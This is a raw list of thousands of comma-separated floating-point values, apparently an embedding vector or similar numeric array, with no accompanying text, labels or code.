0.022794831544160843, -0.0333760641515255, 0.005662270821630955, 0.004412490408867598, -0.0048970989882946014, 0.02104586735367775, 0.015420032665133476, 0.017664536833763123, -0.037719324231147766, -0.030490271747112274, -0.013707505539059639, -0.017329318448901176, -0.026263609528541565, -0.0050865705125033855, 0.022197268903255463, 0.018203800544142723, 0.010887300595641136, -0.05252721905708313, 0.03763187676668167, 0.01290589664131403, 0.008628222160041332, -0.02981983684003353, -0.03629100322723389, 0.04961227998137474, -0.02199322171509266, -0.03754442557692528, -0.01129539217799902, -0.05442193150520325, -0.021177038550376892, -0.039322540163993835, -0.009699462912976742, -0.010661393404006958, -0.006478453986346722, -0.0009236715850420296, 0.05859029293060303, 0.02264908328652382, -0.012060564011335373, -0.008234705775976181, 0.0008380452636629343, 0.035737164318561554, 0.044919226318597794, 0.0014009930891916156, -0.0002229473611805588, -0.012177161872386932, -0.01344516035169363, -0.0349501296877861, -0.017271019518375397, 0.0005005498533137143, -0.01096746139228344, 0.07246540486812592, -0.0025123138912022114, 0.0032446926925331354, -0.011608748696744442, 0.011455713771283627, 0.004077272489666939, -0.03159794956445694, -0.008387739770114422, 0.051011450588703156, -0.017985180020332336, 0.02301345206797123, -0.02199322171509266, 0.02015681006014347, -0.029790686443448067, 0.008081670850515366, 0.02272195741534233, 0.017300168052315712, -0.008577210828661919, -0.006219753064215183, -0.02582636848092079, -0.0047367773950099945, -0.022328440099954605, -0.04279131814837456, -0.02056490257382393, 0.034367144107818604, 0.009509991854429245, 0.011484863236546516, 0.0034906405489891768, 0.013248402625322342, 0.007425809744745493, 0.002397538162767887, -0.02181832678616047, -0.0007464979426003993, -0.013678356073796749, 0.0349501296877861, -0.04996206983923912, 0.02891620434820652, 0.02259078435599804, -0.016003020107746124, 0.01284759771078825, -0.032997120171785355, -0.00564769608899951, -0.003570801578462124, -0.01842242106795311, -0.02326122112572193, 0.00875939428806305, -0.011543162167072296, 0.04768841713666916, -0.027356712147593498, -0.004915317520499229, 0.02772107906639576, -0.01523056160658598, -0.03468778729438782, 0.016950376331806183, -0.026977770030498505, -0.003306634956970811, -0.02592839114367962, -0.009284083731472492, -0.001331763225607574, -0.025068484246730804, -0.0015221452340483665, 0.004233950283378363, -0.02264908328652382, 0.006627844646573067, 0.004550950136035681, 0.030315376818180084, -0.028697583824396133, 0.01948637329041958, 0.008628222160041332, 0.0055748228915035725, -0.042004287242889404, -0.03366755694150925, 0.027808528393507004, 0.008912429213523865, 0.011397415772080421, 0.012920471839606762, 0.02694861963391304, -0.010675967670977116, 0.023989956825971603, 0.04783416539430618, -0.020550327375531197, -0.013350425288081169, 0.0032556236255913973, 0.004102778155356646, -0.012891322374343872, -0.001606860663741827, 0.014851619489490986, 0.010180427692830563, -0.03594120964407921, 0.0025159576907753944, -0.009451692923903465, 0.005137581843882799, 0.05713282525539398, -0.015944721177220345, -0.012162587605416775, 0.00379306566901505, -0.023508990183472633, -0.002590653020888567, -0.001485708518885076, -0.015580354258418083, -0.010318887419998646, -0.0036728244740515947, 0.05013696849346161, 0.04142129793763161, 0.011841943487524986, -0.013190103694796562, -0.023829635232686996, 0.016381962224841118, 0.0033175661228597164, -0.0020185960456728935, -0.0035871979780495167, -0.025243381038308144, -0.003865939099341631, 0.01568237692117691, -0.007549694739282131, 0.0071452464908361435, 0.02777937799692154, -0.005979270674288273, 0.0007920438656583428, 0.013226539827883244, -0.0015704239485785365, 0.004335973411798477, -0.0000668386637698859, 0.04130470007658005, 0.042295780032873154, -0.02027340792119503, -0.019282327964901924, -0.031743697822093964, -0.021687153726816177, -0.005002765916287899, -0.0066897873766720295, 0.022751105949282646, -0.026555104181170464, -0.0006977637531235814, 0.008161831647157669, -0.0018728489521890879, 0.015755251049995422, 0.005199524108320475, -0.024849863722920418, 0.025666046887636185, 0.006955775432288647, 0.0024503713939338923, -0.017023250460624695, -0.011244380846619606, 0.0032519798260182142, -0.01445810217410326, 0.019661270081996918, -0.016673456877470016, 0.01332127582281828, -0.0023683886975049973, 0.023275796324014664, 0.004434352274984121, -0.00007702956645516679, -0.022036947309970856, -0.008912429213523865, 0.013459735549986362, 0.004223019350320101, -0.009371532127261162, 0.016658881679177284, 0.026205310598015785, 0.018262099474668503, 0.01251966692507267, -0.012177161872386932, 0.023159198462963104, 0.00188195810187608, -0.03153965249657631, -0.008256567642092705, -0.010173141025006771, 0.010705117136240005, -0.017212720587849617, 0.008008797653019428, 0.02158513106405735, 0.019122006371617317, 0.0007515079923905432, 0.005731500685214996, 0.03212263807654381, 0.02409197948873043, -0.011411990039050579, -0.004853375256061554, -0.03250158205628395, 0.022386739030480385, -0.009473554790019989, -0.039264243096113205, 0.010989324189722538, 0.010952887125313282, -0.0016378319123759866, -0.004663904197514057, -0.03325946629047394, 0.00012730089656542987, -0.03398820012807846, -0.03113155998289585, -0.008642797358334064, -0.024820713326334953, 0.007170752622187138, 0.016367388889193535, 0.0015740676317363977, 0.010960174724459648, -0.011521300300955772, -0.04002212733030319, -0.014640286564826965, 0.002707250416278839, -0.044336237013339996, -0.0008612736710347235, -0.007076016627252102, -0.008234705775976181, -0.0004718559212051332, 0.008139969781041145, 0.004335973411798477, 0.009480842389166355, -0.007367510814219713, -0.015128538943827152, -0.001558581949211657, -0.0151722626760602, -0.017300168052315712, 0.00280927331186831, -0.012672701850533485, 0.0002306901733390987, 0.005192236974835396, 0.03296796977519989, 0.023742185905575752, -0.02403368055820465, -0.01451640110462904, 0.0251559317111969, 0.0425872728228569, -0.00666063791140914, 0.012446793727576733, -0.004306823946535587, 0.028391515836119652, 0.024849863722920418, 0.0013108120765537024, 0.043316006660461426, 0.006219753064215183, -0.002756440080702305, 0.03183114528656006, -0.011994978412985802, -0.007950498722493649, 0.008715670555830002, 0.01233748346567154, -0.022692807018756866, -0.02533082850277424, 0.006533109117299318, 0.02397538162767887, -0.0393516905605793, -0.006718936841934919, 0.018976259976625443, -0.009182061068713665, 0.019763292744755745, -0.027808528393507004, 0.0060302820056676865, -0.0008466989966109395, 0.03844805806875229, -0.01913658156991005, -0.018101777881383896, 0.004977260250598192, -0.029251422733068466, 0.018203800544142723, -0.00382221513427794, -0.03410479798913002, -0.01954467222094536, 0.022882279008626938, 0.016323663294315338, -0.0002457203227095306, -0.044802628457546234, -0.013452447950839996, 0.02355271577835083, 0.00042585452320054173, -0.013423298485577106, 0.03471693396568298, 0.009910795837640762, -0.023100899532437325, 0.004696696996688843, 0.0006189692649058998, -0.009735899977385998, -0.01478603295981884, -0.012534242123365402, -0.021716302260756493, 0.02534540370106697, 0.007097878959029913, 0.012789299711585045, -0.003895088564604521, 0.005695064086467028, 0.000345010485034436, 0.019865315407514572, 0.026394782587885857, -0.007535120006650686, 0.008999877609312534, 0.02320292219519615, -0.004944466985762119, 0.018611891195178032, 0.00891971681267023, -0.025374552235007286, 0.014822470024228096, -0.005363489501178265, 0.019573822617530823, -0.0010539329377934337, 0.021191613748669624, 0.00033362398971803486, -0.03177284449338913, -0.0116233229637146, -0.015886422246694565, -0.01063953060656786, -0.030636020004749298, 0.03372585400938988, 0.010632243938744068, 0.02145395800471306, -0.03107326105237007, 0.03637845069169998, -0.007739165797829628, 0.0031335605308413506, 0.015463756397366524, -0.01257796585559845, -0.021745452657341957, -0.014596561901271343, -0.03620355576276779, 0.008591786026954651, 0.011455713771283627, -0.016367388889193535, 0.040401067584753036, 0.044336237013339996, 0.01093831192702055, 0.022168118506669998, -0.023348668590188026, -0.0020185960456728935, 0.006106799468398094, -0.0018209265545010567, 0.011455713771283627, -0.022255567833781242, 0.032414134591817856, -0.006398293189704418, -0.020550327375531197, -0.018684765323996544, 0.028187470510601997, -0.010464634746313095, 0.007418522145599127, -0.05585024878382683, 0.004000755026936531, -0.008810406550765038, 0.013248402625322342, -0.007039580028504133, 0.033784154802560806, 0.0038295025005936623, 0.012002265080809593, 0.005924615543335676, -0.01442895270884037, 0.0031135203316807747, -0.014057298190891743, 0.0019329695496708155, -0.009561003185808659, 0.022561635822057724, -0.04273302108049393, 0.007957786321640015, 0.02073979750275612, -0.025913815945386887, 0.025913815945386887, -0.04010957479476929, 0.009786911308765411, -0.0016223463462665677, 0.009189348667860031, -0.005684133153408766, -0.0232466459274292, -0.04818395897746086, 0.02588466741144657, 0.020856395363807678, -0.019049132242798805, 0.00359995081089437, -0.006955775432288647, 0.003193681128323078, -0.012461368925869465, -0.024704117327928543, 0.009240359999239445, -0.04518156871199608, -0.00137093267403543, -0.0060667190700769424, 0.04894184321165085, 0.02390250749886036, -0.0073128556832671165, 0.0218766238540411, 0.01955924741923809, 0.021322786808013916, -0.004634754732251167, -0.020710648968815804, 0.007382085546851158, -0.009437118656933308, -0.02278025634586811, 0.014341505244374275, 0.007979648187756538, 0.051244646310806274, -0.008803118951618671, -0.0012925936607643962, -0.014392516575753689, -0.019398925825953484, -0.002883968874812126, -0.01222088560461998, -0.010741554200649261, 0.0005028271698392928, -0.020185958594083786, 0.02754618227481842, -0.014509113505482674, 0.0010047433897852898, 0.012140724807977676, -0.010129416361451149, 0.011463001370429993, 0.005968339741230011, -0.01699410006403923, -0.009043601341545582, -0.023625588044524193, -0.04626009613275528, -0.013583620078861713, -0.009152911603450775, 0.0317145474255085, 0.0008435107883997262, -0.010406335815787315, 0.016352813690900803, 0.007127028424292803, -0.01200955267995596, 0.01788315735757351, 0.010675967670977116, -0.03728208318352699, -0.021745452657341957, 0.0010284272721037269, -0.033609259873628616, -0.035270772874355316, 0.007819326594471931, -0.012497805058956146, 0.011419277638196945, -0.052731264382600784, 0.011156932450830936, 0.014472677372395992, -0.0022226418368518353, 0.00829300470650196, -0.008416889235377312, 0.0151722626760602, 0.02033170685172081, -0.04133385047316551, 0.02903280220925808, 0.0057023512199521065, -0.018757639452815056, -0.003749341471120715, 0.008679233491420746, 0.028333216905593872, 0.007651717402040958, -0.04002212733030319, 0.032297536730766296, 0.009488129988312721, -0.02004021219909191, -0.013539896346628666, -0.01359090767800808, -0.02754618227481842, -0.010763416066765785, 0.02307175099849701, -0.010712404735386372, 0.030840065330266953, -0.02538912743330002, 0.004973616451025009, 0.009706750512123108, -0.023290371522307396, 0.004816938191652298, 0.013794953934848309, 0.011076771654188633, 0.003306634956970811, -0.031452201306819916, 0.0009664847748354077, 0.017037823796272278, 0.003448738483712077, -0.017154421657323837, -0.031743697822093964, -0.01502651534974575, -0.02063777483999729, -0.014749596826732159, 0.025724345818161964, 0.014625711366534233, -0.026423931121826172, 0.011273530311882496, -0.002505026524886489, 0.03057772107422352, -0.009233072400093079, -0.0022208199370652437, -0.024645818397402763, -0.02181832678616047, 0.019224029034376144, 0.01817465014755726, 0.013984424993395805, 0.01626536436378956, -0.02062319964170456, 0.03780677169561386, 0.01799975521862507, 0.03369670733809471, -0.027881400659680367, -0.011783644556999207, 0.00414650235325098, -0.019704993814229965, 0.00353254284709692, 0.026423931121826172, -0.0010165852727368474, -0.00251049199141562, 0.033288612961769104, 0.013408724218606949, 0.0075861313380301, 0.003898732364177704, -0.008016085252165794, 0.004703984595835209, -0.0013672889908775687, -0.03666994348168373, 0.009072750806808472, 0.0012169874971732497, -0.01944264955818653, 0.029965583235025406, 0.057628363370895386, -0.001008387072943151, -0.0012670879950746894, 0.026555104181170464, -0.026992345228791237, 0.019923614338040352, 0.008300291374325752, 0.004980903584510088, 0.010275163687765598, -0.017635386437177658, 0.018218375742435455, -0.02307175099849701, 0.05241062119603157, -0.028274917975068092, 0.024456346407532692, -0.011834656819701195, -0.001163243199698627, -0.02742958627641201, -0.0013117230264469981, 0.013554470613598824, -0.0015303435502573848, -0.0188888106495142, 0.00022158097999636084, -0.01413017138838768, -0.010428197681903839, -0.026992345228791237, -0.0019293258665129542, -0.00682460330426693, -0.0013527143746614456, 0.02337781898677349, -0.007564269471913576, 0.002084182109683752, -0.012031414546072483, -0.01662973314523697, 0.01096746139228344, -0.020943844690918922, -0.026919471099972725, -0.008037947118282318, 0.008190981112420559, -0.025622323155403137, 0.011433851905167103, -0.009932657703757286, -0.01932605169713497, 0.03465863689780235, -0.020113086327910423, -0.015696952119469643, -0.018145501613616943, -0.03212263807654381, 0.0151722626760602, -0.0027236470486968756, -0.018451569601893425, -0.02604498900473118, -0.005199524108320475, 0.009145624004304409, 0.012709137983620167, -0.006325419992208481, -0.00008249507664004341, 0.08511624485254288, 0.01168162189424038, 0.005797086749225855, -0.007028649095445871, -0.013372287154197693, 0.002736399881541729, 0.0025359978899359703, -0.0025888311211019754, 0.017373042181134224, -0.031044110655784607, -0.0004973616451025009, 0.005880891345441341, 0.0025888311211019754, 0.0034523820504546165, 0.005112076178193092, 0.01658600941300392, -0.020360855385661125, -0.008577210828661919, 0.030781766399741173, -0.026802873238921165, 0.008635509759187698, 0.02009851112961769, 0.00021850664052180946, -0.01728559471666813, 0.02874130755662918, -0.010275163687765598, -0.002587009221315384, -0.022022372111678123, -0.0464932918548584, 0.008081670850515366, 0.006485741585493088, 0.011586886830627918, -0.010661393404006958, -0.005367133300751448, 0.011761782690882683, 0.008650084026157856, 0.028828756883740425, 0.024485496804118156, -0.016119617968797684, -0.0175187885761261, -0.02200779691338539, -0.009728612378239632, -0.018976259976625443, 0.013284838758409023, -0.0035817325115203857, -0.0004877969913650304, 0.009670313447713852, 0.0015084814513102174, -0.010836289264261723, 0.02349441684782505, -0.000627167581114918, -0.012884034775197506, 0.0010448237881064415, 0.0055383858270943165, 0.009109187871217728, -0.0050464896485209465, -0.021118739619851112, -0.013044356368482113, -0.008103533647954464, 0.012359345331788063, 0.011135070584714413, 0.022022372111678123, -0.020783523097634315, -0.012927758507430553, 0.013678356073796749, -0.013139092363417149, -0.048504602164030075, -0.008037947118282318, -0.011659760028123856, 0.018291248008608818, 0.010260588489472866, -0.0030078536365181208, 0.006383718457072973, 0.005031915381550789, 0.0009223052184097469, -0.00891971681267023, -0.008446038700640202, 0.02194949798285961, -0.030956663191318512, -0.02552030049264431, -0.0030461123678833246, 0.016367388889193535, 0.021497681736946106, 0.01454555056989193, -0.00679545383900404, 0.03731123358011246, -0.03101496212184429, -0.014953642152249813, -0.00153489806689322, -0.013751229271292686, -0.024281449615955353, 0.0038732264656573534, 0.017912305891513824, -0.010683255270123482, 0.01932605169713497, 0.0410132072865963, 0.018641041591763496, -0.005716925952583551, -0.02002563700079918, -0.02152683213353157, 0.016964951530098915, 0.004011685959994793, -0.009954520501196384, -0.010712404735386372, -0.012833023443818092, 0.013408724218606949, 0.008285717107355595, -0.009699462912976742, -0.003752985270693898, -0.010683255270123482, -0.028231194242835045, -0.03334691375494003, 0.003237405326217413, -0.03011132963001728, -0.0032975259236991405, 0.004492651205509901, 0.010326175019145012, 0.003767560003325343, -0.014917205087840557, -0.016950376331806183, -0.007593418471515179, 0.020127661526203156, 0.007761027663946152, -0.024660391733050346, -0.007225407753139734, -0.00712338462471962, 0.0300530306994915, -0.021628854796290398, 0.030781766399741173, 0.01269456371665001, 0.01823294907808304, 0.02210981957614422, 0.010945599526166916, -0.012782012112438679, -0.009692175313830376, -0.04626009613275528, 0.006948488298803568, 0.014319642446935177, -0.009575577452778816, 0.0029021871741861105, -0.009335095062851906, 0.010143991559743881, 0.0039351689629256725, 0.009612014517188072, 0.018757639452815056, 0.007039580028504133, 0.02205152064561844, 0.004029904492199421, -0.004029904492199421, 0.021716302260756493, 0.027342136949300766, -0.0232466459274292, 0.011820081621408463, 0.005170374643057585, 0.0034961062483489513, -0.005603972356766462, 0.01138284057378769, -0.02654052898287773, -0.018801363185048103, 0.017212720587849617, -0.014807894825935364, 0.021862050518393517, 0.00551288016140461, -0.006121374201029539, 0.007298280950635672, 0.03250158205628395, -0.0022117106709629297, -0.0052104550413787365, -0.013780378736555576, 0.004386984743177891, 0.04031362012028694, 0.010712404735386372, -0.018932534381747246, -0.002720003481954336, 0.013394149020314217, 0.04870864748954773, 0.019355202093720436, -0.0030479340348392725, 0.029426319524645805, -0.0355331189930439, 0.014640286564826965, 0.015900997444987297, 0.012257322669029236, -0.01257796585559845, -0.017300168052315712, -0.0062161097303032875, 0.0038622955325990915, 0.011215231381356716, -0.0344545915722847, 0.010085692629218102, 0.007914061658084393, 0.03349266201257706, -0.010945599526166916, -0.02665712684392929, 0.02891620434820652, -0.02509763278067112, -0.009553715586662292, -0.0300530306994915, 0.004350548144429922, -0.008642797358334064, -0.02330494485795498, -0.0259866900742054, -0.0068355342373251915, 0.005458225030452013, -0.008059808984398842, -0.045473065227270126, -0.01356175821274519, -0.008387739770114422, 0.0014984613517299294, 0.019005408510565758, 0.008314866572618484, -0.0014356079045683146, 0.005800730548799038, 0.004499938804656267, 0.03748612850904465, -0.007593418471515179, -0.022751105949282646, -0.012621690519154072, 0.00733471754938364, 0.0028967217076569796, 0.0060339258052408695, -0.0007715481915511191, 0.004580099601298571, -0.003184571862220764, -0.005119363311678171, 0.005585753824561834, 0.015711527317762375, -0.017329318448901176, 0.007221763953566551, 0.006452948320657015, -0.017081547528505325, -0.020404579117894173, -0.007014074362814426, 0.02473326586186886, -0.027152666822075844, 0.005625834222882986, 0.007061442360281944, 0.014953642152249813, 0.0008626400376670063, -0.005571179091930389, 0.006219753064215183, 0.006329063326120377, -0.018641041591763496, -0.01770826056599617, -0.007505970541387796, -0.0003443273017182946, 0.015842698514461517, 0.004037192091345787, -0.01484433189034462, 0.007863050326704979, -0.01219173613935709, 0.009670313447713852, -0.005691420286893845, -0.017985180020332336, 0.0038477207999676466, 0.020462878048419952, -0.0020969349425286055, -0.018874237313866615, -0.0032774857245385647, -0.006307201460003853, 0.03188944235444069, -0.008358590304851532, -0.009029027074575424, 0.0175187885761261, -0.03238498419523239, 0.015492905862629414, 0.0065076034516096115, -0.006183316465467215, -0.0005793443415313959, 0.006114086601883173, 0.002596118487417698, -0.020011063665151596, -0.014479964040219784, -0.018101777881383896, -0.013751229271292686, 0.012745575048029423, 0.015536630526185036, -0.011142358183860779, -0.005625834222882986, 0.010384473949670792, -0.012045989744365215, 0.04693053290247917, -0.0029550204053521156, -0.00862093549221754, 0.004419778008013964, 0.0023319520987570286, -0.0524689182639122, -0.00431046774610877, 0.011718058958649635, 0.007746452931314707, 0.009123762138187885, -0.0017598950071260333, 0.016177916899323463, -0.031393904238939285, -0.0007342005264945328, -0.021308211609721184, -0.022445037961006165, 0.037894219160079956, 0.008467900566756725, -0.0074768210761249065, 0.00764443026855588, 0.024951886385679245, 0.008905141614377499, -0.004835156723856926, 0.0009027204941958189, -0.002160699339583516, -0.006584120914340019, -0.0038914449978619814, 0.01568237692117691, 0.010391761548817158, -0.007298280950635672, -0.004204800818115473, -0.0338716022670269, -0.005654983688145876, 0.005414500832557678, -0.019413501024246216, -0.051011450588703156, 0.02027340792119503, -0.025534873828291893, -0.0014920849353075027, -0.0016232571797445416, -0.0015467400662600994, -0.011907530017197132, -0.022284716367721558, -0.017183572053909302, -0.020914694294333458, -0.009349670261144638, -0.017956029623746872, -0.011535875499248505, -0.02409197948873043, 0.01865561679005623, 0.006405580788850784, 0.02384420856833458, -0.0068318904377520084, 0.005658627487719059, 0.023887934163212776, 0.021322786808013916, 0.001216076547279954, -0.004988191183656454, 0.01487348135560751, -0.029776111245155334, 0.03815656527876854, 0.00005938051617704332, 0.008344016037881374, 0.011878380551934242, 0.008344016037881374, -0.006605982780456543, 0.014414378441870213, -0.018611891195178032, -0.013423298485577106, -0.008861417882144451, -0.003488818882033229, 0.011637898162007332, -0.00036049610935151577, 0.006445661187171936, 0.020244257524609566, -0.008883279748260975, 0.006372787524014711, 0.01001281850039959, -0.01699410006403923, 0.012526954524219036, 0.00843146350234747, -0.0073128556832671165, 0.009808773174881935, 0.01386053953319788, -0.017679112032055855, -0.01616334170103073, 0.022372163832187653, 0.01674633100628853, 0.009750474244356155, 0.02122076228260994, -0.02862471155822277, 0.017781134694814682, -0.006904764100909233, -0.001394616556353867, -0.004634754732251167, 0.03051942214369774, -0.04005127400159836, -0.014319642446935177, 0.025141358375549316, -0.006241615395992994, -0.012228173203766346, -0.0026307334192097187, -0.0011031226022168994, 0.0006107710069045424, -0.009203922934830189, -0.019632121548056602, -0.005217742640525103, -0.015420032665133476, -0.005199524108320475, 0.026904895901679993, 0.022401314228773117, 0.03188944235444069, 0.023567289113998413, 0.0031882156617939472, -0.010989324189722538, -0.016527710482478142, 0.030956663191318512, -0.016498560085892677, -0.01705239899456501, 0.013933413662016392, -0.03547481819987297, 0.016250791028141975, 0.02283855527639389, 0.010887300595641136, 0.015536630526185036, -0.02635105699300766, -0.023159198462963104, 0.029295146465301514, -0.004875237122178078, 0.0046092490665614605, 0.02463124319911003, -0.016381962224841118, 0.0015449181664735079, -0.0053962827660143375, -0.0005333429435268044, 0.00813268218189478, 0.015755251049995422, 0.022445037961006165, -0.0020677854772657156, 0.024718690663576126, -0.009262221865355968, -0.008526199497282505, -0.020725224167108536, -0.0073128556832671165, -0.010005531832575798, -0.012264610268175602, 0.015536630526185036, -0.012672701850533485, 0.010603094473481178, 0.007578844204545021, -0.0009327807929366827, 0.015755251049995422, -0.01156502403318882, 0.029047377407550812, 0.018699340522289276, -0.005450937896966934, -0.0068173157051205635, -0.0002673546550795436, 0.006456592120230198, 0.0016633376944810152, 0.004474432673305273, 0.007848476059734821, 0.0039351689629256725, -0.011871092952787876, -0.0012306512799113989, -0.02492273785173893, -0.009356957860291004, -0.014691297896206379, -0.010282451286911964, 0.022619934752583504, -0.002987813437357545, 0.01901998370885849, 0.013765804469585419, 0.0011067662853747606, 0.0012242747470736504, -0.0045728120021522045, -0.0006513068801723421, 0.004376053810119629, -0.00082529237261042, 0.015580354258418083, -0.014596561901271343, 0.011812794022262096, -0.008540773764252663, 0.003035181201994419, 0.00029992000781930983, 0.02210981957614422, -0.007283706218004227, -0.015405457466840744, -0.011798219755291939, 0.008190981112420559, -0.014064585790038109, 0.021803751587867737, 0.0019584752153605223, 0.0076735797338187695, -0.007076016627252102, -0.017212720587849617, -0.017198145389556885, 0.012803873978555202, 0.000564314192160964, 0.0036691806744784117, 0.024194002151489258, 0.005636765155941248, -0.0018282139208167791, -0.0021843831054866314, -0.0032610890921205282, -0.013401436619460583, -0.019238604232668877, 0.0149026308208704, -0.008832268416881561, 0.00029764269129373133, -0.029076525941491127, 0.00752783240750432, 0.004795076325535774, 0.0029495549388229847, 0.00755698187276721, 0.009597440250217915, 0.023028025403618813, 0.007921349257230759, -0.001991268480196595, -0.011207944713532925, -0.0060485005378723145, -0.008985302411019802, 0.002587009221315384, 0.007950498722493649, 0.005582110024988651, -0.010195002891123295, 0.0014638464199379086, 0.02301345206797123, -0.014334217645227909, 0.011790932156145573, 0.006620557513087988, -0.005804374348372221, -0.0031918592285364866, -0.011360978707671165, 0.005126650910824537, -0.005447294097393751, 0.0008457880467176437, -0.012833023443818092, -0.005953765008598566, 0.0019275040831416845, 0.000434280518675223, 0.01979244314134121, -0.01794145628809929, -0.011186081916093826, -0.0011641541495919228, 0.02092926949262619, -0.006518534384667873, -0.005436363164335489, -0.01878678798675537, -0.006248902529478073, -0.0017234582919627428, -0.0033284970559179783, -0.007068729493767023, 0.012439506128430367, 0.00846061296761036, 0.016979524865746498, -0.013058931566774845, 0.003547117579728365, -0.013510746881365776, 0.0065294657833874226, 0.0014101022388786077, 0.0025888311211019754, 0.01616334170103073, 0.003248336259275675, -0.016411112621426582, 0.012956907972693443, -0.025782644748687744, -0.017489640042185783, 0.01332127582281828, 0.015347159467637539, 0.004266743548214436, 0.011958541348576546, -0.0015959296142682433, -0.0031718190293759108, -0.005607615690678358, -0.011572311632335186, 0.008504337631165981, 0.011091346852481365, 0.007899487391114235, -0.0052104550413787365, 0.011215231381356716, 0.012840311042964458, 0.022882279008626938, 0.0034815315157175064, 0.020768947899341583, -0.0012242747470736504, 0.0005438185180537403, -0.0020094867795705795, -0.02463124319911003, 0.007935924455523491, -0.0013281195424497128, -0.013569045811891556, 0.013328563421964645, 0.0032629109919071198, -0.0008744819788262248, 0.03203519061207771, -0.009947232902050018, -0.02264908328652382, -0.001104944502003491, 0.021658003330230713, 0.002570612821727991, 0.0007938657072372735, -0.02527252957224846, -0.006682499777525663, -0.006915695033967495, 0.004929892253130674, -0.005057421047240496, -0.021235337480902672, -0.001331763225607574, 0.022867703810334206, 0.000989257707260549, -0.02885790541768074, 0.02796884998679161, -0.022488761693239212, -0.0027181815821677446, -0.02110416628420353, -0.004128283821046352, 0.012089713476598263, 0.02002563700079918, -0.004729490261524916, 0.004284961614757776, -0.0023720324970781803, 0.014472677372395992, -0.0010931025026366115, -0.022386739030480385, 0.005804374348372221, -0.012716425582766533, -0.005804374348372221, -0.004062697757035494, -0.000636732205748558, 0.005877247545868158, 0.001491173985414207, -0.019238604232668877, -0.007218120153993368, -0.024339748546481133, -0.02517050690948963, -0.003224652260541916, -0.010624956339597702, -0.02677372470498085, 0.01687750220298767, -0.006587764248251915, -0.0007501415675505996, -0.002045923611149192, 0.022226417437195778, 0.017023250460624695, -0.008183694444596767, -0.009801485575735569, 0.005589397624135017, 0.02050660364329815, 0.011455713771283627, -0.007061442360281944, -0.0025323540903627872, -0.01377309113740921, -0.012782012112438679, 0.03404650092124939, -0.0010912807192653418, 0.0018509868532419205, -0.00911647453904152, -0.015390883199870586, 0.00011500349501147866, -0.01093831192702055, -0.01693580113351345, -0.0025451069232076406, -0.01998191326856613, 0.0020295269787311554, 0.002856641309335828, -0.0031590661965310574, 0.0017261910252273083, 0.029659515246748924, -0.009539141319692135, 0.016236215829849243, -0.026161586865782738, -0.0022044233046472073, 0.0012679989449679852, -0.014662148430943489, -0.019398925825953484, 0.008118107914924622, 0.014866193756461143, 0.0060521443374454975, 0.023887934163212776, 0.021920349448919296, -0.02385878376662731, 0.002166164806112647, 0.010406335815787315, -0.010143991559743881, -0.01801432855427265, 0.007607993204146624, 0.0033175661228597164, 0.0188888106495142, 0.012330195866525173, -0.014254056848585606, -0.01233748346567154, -0.0007487752009183168, -0.01105490978807211, -0.02276568114757538, 0.008249280042946339, 0.010836289264261723, -0.010326175019145012, 0.012395782396197319, 0.007159821223467588, 0.0028785031754523516, 0.008438751101493835, 0.009233072400093079, -0.008307578973472118, -0.008504337631165981, -0.010275163687765598, -0.004292249213904142, -0.0002876225917134434, -0.0027910550124943256, 0.016294514760375023, -0.00035298100556246936, 0.00709423515945673, -0.008037947118282318, -0.009094612672924995, -0.04800906032323837, -0.0010284272721037269, 0.012075139209628105, -0.02355271577835083, 0.01031159982085228, 0.013998999260365963, 0.0006244347896426916, -0.005625834222882986, -0.0005998400156386197, -0.014035436324775219, 0.012592541053891182, -0.0032319396268576384, 0.014851619489490986, 0.03696143999695778, 0.00502098398283124, 0.016177916899323463, -0.007520545274019241, 0.012599827721714973, 0.0063764313235878944, -0.01728559471666813, 0.03148135170340538, 0.005450937896966934, 0.006070362403988838, 0.021497681736946106, -0.014982791617512703, -0.022692807018756866, 0.005090213846415281, 0.0034268763847649097, -0.0023191990330815315, 0.0029787044040858746, -0.007651717402040958, 0.012155300006270409, -0.01818922534584999, -0.010880013927817345, -0.010989324189722538, 0.006937557365745306, 0.0035817325115203857, 0.04293706640601158, 0.009546428918838501, -0.000017734450011630543, 0.0036509623751044273, 0.02372761070728302, -0.035445671528577805, -0.016192492097616196, -0.01287674717605114, 0.01973414421081543, 0.013037068769335747, -0.016381962224841118, 0.002215354470536113, 0.010143991559743881, 0.0070031434297561646, -0.006605982780456543, 0.0014875303022563457, -0.008650084026157856, 0.00736386701464653, -0.022284716367721558, 0.026074137538671494, -0.009029027074575424, 0.005818949081003666, 0.018145501613616943, -0.018407845869660378, -0.0022845843341201544, 0.018553592264652252, -0.008220130577683449, -0.0024685899261385202, 0.008693808689713478, 0.012395782396197319, 0.018641041591763496, 0.024164851754903793, 0.015463756397366524, 0.029353445395827293, -0.003275663824751973, 0.004405203275382519, -0.004478076472878456, -0.011667047627270222, -0.003538008313626051, 0.011841943487524986, 0.030810914933681488, 0.010034681297838688, 0.004193869885057211, 0.009254934266209602, 0.0023665667977184057, -0.012920471839606762, 0.013678356073796749, -0.0132629768922925, -0.006383718457072973, -0.009881646372377872, -0.011448427103459835, 0.005002765916287899, 0.03477523475885391, -0.009225784800946712, -0.009531853720545769, 0.002408469095826149, 0.0026143367867916822, -0.014341505244374275, -0.007833900861442089, -0.004656616598367691, 0.004642041865736246, -0.0009901686571538448, -0.016833778470754623, -0.017096122726798058, 0.012045989744365215, 0.005170374643057585, -0.0021789176389575005, -0.008824980817735195, -0.009619302116334438, -0.059114981442689896, -0.015070240013301373, 0.0050610643811523914, 0.02808544598519802, 0.010318887419998646, 0.015420032665133476, 0.0026161586865782738, 0.0011413812171667814, 0.012461368925869465, -0.0276044812053442, 0.0017116162925958633, -0.025593172758817673, 0.004725846461951733, 0.003434163751080632, -0.0007524188840761781, -0.01439980324357748, -0.011616036295890808, 0.02110416628420353, -0.002643486252054572, 0.004299536347389221, -0.021730877459049225, 0.016119617968797684, -0.002426687628030777, 0.01290589664131403, -0.018407845869660378, -0.0014274097047746181, -0.020535752177238464, 0.02146853320300579, -0.02015681006014347, 0.0038331460673362017, -0.00019083748338744044, 0.01427591871470213, -0.007651717402040958, -0.023640163242816925, -0.007826614193618298, 0.007061442360281944, -0.009320520795881748, -0.010785277932882309, 0.0035434740129858255, -0.011667047627270222, -0.0031955030281096697, 0.006616913713514805, -0.0008371343137696385, -0.01662973314523697, -0.009407969191670418, -0.026219885796308517, -0.021570555865764618, -0.005603972356766462, -0.018524443730711937, 0.00048278694157488644, -0.017023250460624695, -0.010049255564808846, -0.0008662837208248675, 0.009160199202597141, -0.010457347147166729, 0.004011685959994793, -0.03410479798913002, -0.031801994889974594, -0.021249912679195404, -0.005294259637594223, 0.008373165503144264, 0.01658600941300392, 